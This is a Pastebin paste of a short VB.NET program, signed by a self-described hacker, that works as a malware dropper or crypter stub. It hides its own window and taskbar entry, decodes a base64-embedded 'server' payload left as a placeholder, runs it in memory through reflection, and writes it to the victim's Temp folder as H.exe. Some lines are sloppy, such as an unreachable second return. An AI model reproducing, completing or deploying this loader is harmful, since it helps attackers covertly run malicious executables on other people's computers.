Advertisement
Guest User

COde

a guest
Nov 3rd, 2016
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. Public Class Form1
  2. 'Coded By Hicham Hacker
  3. 'https://www.facebook.com/Hicham.Hackere.1
  4. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  5. ShowIcon = False
  6. ShowInTaskbar = False
  7. Opacity = False
  8. Me.Hide()
  9. System.Threading.Thread.Sleep(3000)
  10.  
  11. Dim a As String = "هنا ضع قيم السيرفر"
  12. Dim h As Byte() = Convert.FromBase64String(a)
  13. Dim c As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(h).EntryPoint.Invoke(Nothing, Nothing)
  14. IO.File.WriteAllBytes(Explerer, h)
  15. End Sub
  16. Function Explerer()
  17. Return "C:/Users/" + Environment.UserName + "\AppData\Local\Temp" + "/H.exe"
  18. Return "C:/Users/" + Environment.UserName + "\AppData\Roaming" + "/H.exe"
  19. End Function
  20. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement